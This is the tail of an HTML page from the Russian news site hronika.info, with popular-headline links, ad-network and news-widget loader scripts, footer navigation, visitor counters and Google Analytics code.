    <a href="http://hronika.info/kultura/376897-zvezda-kvartala-95-pokazala-kak-vyglyadit-bez-makiyazha.html"><span>07.12-12:36</span>
	<strong title="Звезда "Квартала-95" показала, как выглядит без макияжа">Звезда "Квартала-95" показала, как выглядит без макияжа</strong></a><b>29205</b><div class="category_lastn_date" title="Культура">&nbsp;&nbsp;<a href="http://hronika.info/kultura/">Культура</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kurjozy/376910-novyy-god-otmenyaetsya-ufologi-nazvali-novuyu-datu-konca-sveta.html"><span>07.12-12:16</span>
	<strong title="Новый год отменяется: уфологи назвали новую дату Конца света">Новый год отменяется: уфологи назвали новую дату Конца света</strong></a><b>28074</b><div class="category_lastn_date" title="Курьезы">&nbsp;&nbsp;<a href="http://hronika.info/kurjozy/">Курьезы</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kurjozy/377380-ulybnites-smeshnye-anekdoty-dlya-horoshego-nastroeniya.html"><span>09.12-09:42</span>
	<strong title="Улыбнитесь: смешные анекдоты для хорошего настроения">Улыбнитесь: смешные анекдоты для хорошего настроения</strong></a><b>23317</b><div class="category_lastn_date" title="Курьезы">&nbsp;&nbsp;<a href="http://hronika.info/kurjozy/">Курьезы</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/375807-nazvan-privychnyy-produkt-normalizuyuschiy-arterialnoe-davlenie.html"><span>04.12-09:39</span>
	<strong title="Назван привычный продукт, нормализующий артериальное давление">Назван привычный продукт, нормализующий артериальное давление</strong></a><b>19546</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kurjozy/376812-v-gruzii-vaz-2106-prostoyal-na-balkone-27-let.html"><span>07.12-03:48</span>
	<strong title="В Грузии ВАЗ-2106 простоял на балконе 27 лет">В Грузии ВАЗ-2106 простоял на балконе 27 лет</strong></a><b>19429</b><div class="category_lastn_date" title="Курьезы">&nbsp;&nbsp;<a href="http://hronika.info/kurjozy/">Курьезы</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/376609-nazvany-napitki-normalizuyuschie-arterialnoe-davlenie.html"><span>06.12-14:43</span>
	<strong title="Названы напитки, нормализующие артериальное давление">Названы напитки, нормализующие артериальное давление</strong></a><b>18359</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/376775-eti-produkty-pomogut-snizit-arterialnoe-davlenie.html"><span>07.12-01:15</span>
	<strong title="Эти продукты помогут снизить артериальное давление">Эти продукты помогут снизить артериальное давление</strong></a><b>15042</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/375737-nazvany-lekarstva-kotorye-ploho-vliyayut-na-potenciyu.html"><span>03.12-21:38</span>
	<strong title="Названы лекарства, которые плохо влияют на потенцию">Названы лекарства, которые плохо влияют на потенцию</strong></a><b>15031</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/376623-mediki-rasskazali-kak-chesnok-vliyaet-na-serdce.html"><span>06.12-15:13</span>
	<strong title="Медики рассказали, как чеснок влияет на сердце">Медики рассказали, как чеснок влияет на сердце</strong></a><b>14301</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/376640-vrachi-nazvali-speciyu-sposobstvuyuschuyu-vosstanovleniyu-zreniya.html"><span>06.12-15:55</span>
	<strong title="Врачи назвали специю, способствующую восстановлению зрения">Врачи назвали специю, способствующую восстановлению зрения</strong></a><b>14016</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div>
		</div>			         
	</div>
</div>
 <div class="clr"></div>
 
					
</div>

            
  
          
          <div class="wrap">
              <div id="bn_9bfe796fdf">загрузка...</div>
<script type="text/javascript" src="//recreativ.ru/rcode.9bfe796fdf.js"></script>
              <h3>Интересные новости</h3>
              <!-- noindex --><div id="n4p_31957">Loading...</div>
<script type="text/javascript" charset="utf-8">
  (function(d,s){
    var o=d.createElement(s);
    o.async=true;
    o.type="text/javascript";
    o.charset="utf-8";
    if (location.protocol == "https:") {
      o.src="https://js-ru.redtram.com/n4p/0/31/ticker_31957.js";
    }
    else {
      o.src="http://js.ru.redtram.com/n4p/0/31/ticker_31957.js";
    }
    var x=d.getElementsByTagName(s)[0];
    x.parentNode.insertBefore(o,x);
  })(document,"script");
</script><!--/ noindex -->
              <!--noindex -->
<!-- MarketGidNews Start -->
<div id="MarketGidScriptRootN8362" class="news-block-magick">
    <div id="MarketGidPreloadN8362">
        <a id="mg_add8362" href="http://usr.marketgid.com/demo/celevie-posetiteli/" rel="nofollow" target="_blank"><img src="//cdn.marketgid.com/images/marketgid_add_link.png" style="border:0px"></a><br>        <a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a>    
    </div>
    <script>
                        (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("MarketGidScriptRootN8362")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("MarketGidScriptRootN8362");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=8362;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.marketgid.com/h/r/hronika.info.8362.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- MarketGidNews End -->
<!--/noindex-->
              <!--noindex-->
<!-- LentaInformNews Start -->
<div id="LentaInformScriptRootN14129" class="news-block-magick">
    <div id="LentaInformPreloadN14129">
                <a href="http://lentainform.com/" target="_blank">Загрузка...</a>    
    </div>
    <script>
                        (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN14129")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN14129");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=14129;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.lentainform.com/h/r/hronika.info.14129.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- LentaInformNews End -->
<!--/noindex -->
              <div class="join_informer_3674" id="join_informer_3674"></div>

<!-- Асинхронный код, 10.02.2016 -->
<script type="text/javascript">  (function() {
var i = document.createElement("script"); i.type = "text/javascript";
i.async = true; i.charset = "UTF-8";
i.src = "//partner.join.com.ua/async/3674/";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(i, s);
})();</script>
<!--  News Join -->
             </div>		        
          
          
          <div class="wrap">
            	<h3>Мы в Фейсбук</h3>
              <!--noindex--><div class="fb-page" data-href="https://www.facebook.com/Hronika.info/" data-width="300" data-height="220" data-small-header="false" data-adapt-container-width="true" data-hide-cover="false" data-show-facepile="true"><blockquote cite="https://www.facebook.com/Hronika.info/" class="fb-xfbml-parse-ignore"><a href="https://www.facebook.com/Hronika.info/">Хроника мировых событий</a></blockquote></div><!--/noindex-->
			</div>
          
        
          <!--<div class="wrap">
            	<h3>Наш опрос</h3>
		        
			</div>
        -->
       
       		   </div>

            
  
                 
      </aside>
                      <div class="fullstory_bottom">
         <div class="bshadow">
		 
         <div class="clr"></div>
         </div>
      </div> 

        </section> 
      </div>
      <footer id="footer">
        <div class="maxw">			<nav class="footbut">
				<ul class="clr reset">
				    <li><a href="/politika/" >Политика</a></li>
					<li><a href="/ekonomika/" >Экономика</a></li>
					<li><a href="/tehnologii/" >Технологии</a></li>
					<li><a href="/avto/" >Авто</a></li>
					<li><a href="/obwestvo/" >Общество</a></li>
					<li><a href="/otdyh/" >Отдых</a></li>
					<li><a href="/neverojatnoe/" >Невероятное</a></li>
					<li><a href="/nedvizhimost/" >Недвижимость</a></li>	
					<li><a href="/videonovosti/" >Видеоновости</a></li>
                    <li><a href="/fotoreportazhi/" >Фоторепортажи</a></li>						
				</ul>					
				<ul class="clr reset">
					<li><a href="/rossija/" >Россия</a></li>
					<li><a href="/ukraina/" >Украина</a></li>
					<li><a href="/mir/" >Мир</a></li>
					<li><a href="/kultura/" >Культура</a></li>					
					<li><a href="/sport/" >Спорт</a></li>
					<li><a href="/medicina/" >Медицина</a></li>					
					<li><a href="/greenpeace/" >Гринпис</a></li>
				    <li><a href="/kriminal/" >Криминал</a></li>
					<li><a href="/igry/" >Игры</a></li>
					<li><a href="/videoigry/" >Видеоигры</a></li>					
				</ul>
			</nav>
            <a href="#"><img src="/templates/hronika/images/banners/footrekl.png" alt="Реклама" class="footrekl" /></a>
            <div class="clr5"></div>
            <div class="copyright_f"><p>Новостное интернет издание Хроника мировых событий - всегда только горячие и интересные новости со всей планеты. Все самые свежие события, происшествия, достижения и открытия мира освещаются на нашем сайте специально для вас. Копирование и использование информации с сайта Хроника инфо разрешается при условии прямой, открытой для поисковых систем гиперссылки на наш сайт. <span>hronika.info &copy; 2012-2018</span></p></div>
            <div class="counts">
            <nav class="footbut2">
            <ul class="clr5 reset">
              <li><a href="http://hronika.info/o-nas.html">О нас</a></li>
              <li><a href="http://hronika.info/sitemap.xml">Карта</a></li>
              <li><a href="http://hronika.info/vakansii.html">Вакансии</a></li>
              <li><a href="http://hronika.info/konakt.html">Контакты</a></li>
            </ul>   
                
            </nav>
            <!--noindex-->
              <div class="count"><!--noindex-->
<!--LiveInternet counter--><script type="text/javascript">
document.write("<a href='//www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t17.12;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";h"+escape(document.title.substring(0,150))+";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров за 24"+
" часа, посетителей за 24 часа и за сегодня' "+
"border='0' width='88' height='31'><\/a>")
</script><!--/LiveInternet-->
<!--/noindex--></div>
              <div class="count"><!--noindex-->
<!-- I.UA counter --><a href="http://www.i.ua/" target="_blank" onclick="this.href='http://i.ua/r.php?165947';" title="Rated by I.UA">
<script type="text/javascript"><!--
iS='http'+(window.location.protocol=='https:'?'s':'')+
'://r.i.ua/s?u165947&p164&n'+Math.random();
iD=document;if(!iD.cookie)iD.cookie="b=b; path=/";if(iD.cookie)iS+='&c1';
iS+='&d'+(screen.colorDepth?screen.colorDepth:screen.pixelDepth)
+"&w"+screen.width+'&h'+screen.height;
iT=iR=iD.referrer.replace(iP=/^[a-z]*:\/\//,'');iH=window.location.href.replace(iP,'');
((iI=iT.indexOf('/'))!=-1)?(iT=iT.substring(0,iI)):(iI=iT.length);
if(iT!=iH.substring(0,iI))iS+='&f'+escape(iR);
iS+='&r'+escape(iH);
iD.write('<img src="'+iS+'" border="0" width="88" height="31" />');
//--></script></a><!-- End of I.UA counter -->
<!--/noindex--></div>
              <div class="count"></div>
              <div class="count"></div>
            <!--/noindex--></div>
      </footer>
      <a href="#top" id="goTop" class="go-top"><img src="/templates/hronika/images/up.png" alt="наверх" title="Подняться наверх" /></a>
      
<!-- popup     
      <div class="news-bot-show">
        <div id="dim7">
          <div class="msgbox7">
            <div class="msgboxttl7">
              <b>Материалы в разделе&nbsp;











НЕВЕРОЯТНОЕ








</b>
              <a class="close7">X</a>
            </div>











<div class="vsplivayushee-okno">
    <span class="spandate">10.12-06:52</span>
	<strong title="Эксперты рассказали о возможном наличии интеллекта у растений"><a href="http://hronika.info/neverojatnoe/377614-eksperty-rasskazali-o-vozmozhnom-nalichii-intellekta-u-rasteniy.html">Эксперты рассказали о возможном наличии</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">10.12-04:22</span>
	<strong title="Ученые предупредили о кардинальном изменении климата в 2019 году"><a href="http://hronika.info/neverojatnoe/377608-uchenye-predupredili-o-kardinalnom-izmenenii-klimata-v-2019-godu.html">Ученые предупредили о кардинальном изменении</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">10.12-02:03</span>
	<strong title="Одной из стран Европы грозит полное затопление"><a href="http://hronika.info/neverojatnoe/377602-odnoy-iz-stran-evropy-grozit-polnoe-zatoplenie.html">Одной из стран Европы грозит полное затопление</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">10.12-00:52</span>
	<strong title="Британка две недели не могла расстаться с мертворожденной дочерью"><a href="http://hronika.info/neverojatnoe/377596-britanka-dve-nedeli-ne-mogla-rasstatsya-s-mertvorozhdennoy-docheryu.html">Британка две недели не могла расстаться с</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">09.12-23:44</span>
	<strong title="Найден ген, отличающий человека от животных"><a href="http://hronika.info/neverojatnoe/377588-nayden-gen-otlichayuschiy-cheloveka-ot-zhivotnyh.html">Найден ген, отличающий человека от животных</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">09.12-23:02</span>
	<strong title="Археологи наткнулись на "идеальный" камень"><a href="http://hronika.info/neverojatnoe/377581-arheologi-natknulis-na-idealnyy-kamen.html">Археологи наткнулись на "идеальный" камень</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">09.12-22:18</span>
	<strong title="Исследование выяснили, как пребывание в космосе может изменить иммунитет"><a href="http://hronika.info/neverojatnoe/377574-issledovanie-vyyasnili-kak-prebyvanie-v-kosmose-mozhet-izmenit-immunitet.html">Исследование выяснили, как пребывание в космосе</a></strong>			
</div>













            <hr />»
            <a href="/">Перейти на главную</a>
          </div>
        </div>
      </div>
-->
      
    <div id="fb-root"></div>
      <script type="text/javascript">	
$(document).ready(function(){$("#newstab2, #listalka_tab, #rightbl_tab, #ax_popular_obs, #ax_popular_comp").easyTabs({defaultContent:1})});$(document).ready(function(){$("#slider3").tinycarousel({pager:true,interval:true})});$(document).ready(function(){$("#dim7").css("height",$(document).height());$(".alert7").click(function(){$("#dim7").fadeIn();return false});$(".close7").click(function(){$(".news-bot-show").remove();return false})});$(window).bind("resize",function(){$("#dim7").css("height",$(window).height())});
$(document).ready(function(){$("div.short_2").addClass("alt");$("div.short_2_clr:even").addClass("alt")});
    </script>
<div id="fb-root"></div>

	<script type="text/javascript" src="/templates/hronika/js/libs.js"></script>
	<script type="text/javascript" src="/templates/hronika/js/orating_pack.js"></script>
        <!--[if IE]>
	<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
	<![endif]-->
	<!--[if IE 8]><link href="/templates/hronika/css/ie8.css"  rel="stylesheet" media="all" /><![endif]-->
<script>
(function(i,s,o,g,r,a,m){i["GoogleAnalyticsObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date;a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,"script","//www.google-analytics.com/analytics.js","ga");ga("create","UA-48298212-1","hronika.info");ga("send","pageview");
</script>

<script>window.RESOURCE_O1B2L3 = 'leokross.com';</script>
<script src="//leokross.com/ED9.js" ></script>
 
</body>

</html>
<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->
